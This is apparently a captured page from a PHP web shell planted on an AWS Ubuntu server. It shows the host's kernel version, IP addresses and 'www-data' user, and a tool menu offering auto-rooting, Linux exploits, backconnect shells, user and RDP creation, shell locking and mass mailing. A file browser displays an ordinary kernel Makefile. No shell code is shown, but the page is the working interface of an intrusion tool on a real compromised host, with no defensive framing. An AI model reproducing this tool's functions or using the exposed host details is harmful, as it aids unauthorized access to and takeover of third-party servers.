Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.129.73.6
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-aws-5.4-headers-5.4.0-1060 /
ubuntu /
[ HOME SHELL ]
Name
Size
Permission
Action
hio
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
xr-usb-serial
[ DIR ]
drwxr-xr-x
Kconfig
563
B
-rw-r--r--
Makefile
567
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
# # Makefile for the Linux kernel ubuntu supplied third-party device drivers. # # # NOTE: to allow drivers to be added and removed without causing merge # collisions you should add new entries in the middle of the six lines # of ## at the bottom of the list. Always add three lines of ## above # your new entry and maintain the six lines below. # ## ## ## ## ## ## obj-$(CONFIG_HIO) += hio/ ## ## ## ifeq ($(ARCH),x86) obj-y += xr-usb-serial/ endif ## ## ## ## ## ## # This is a stupid trick to get kbuild to create ubuntu/built-in.o obj- += foo.o
Close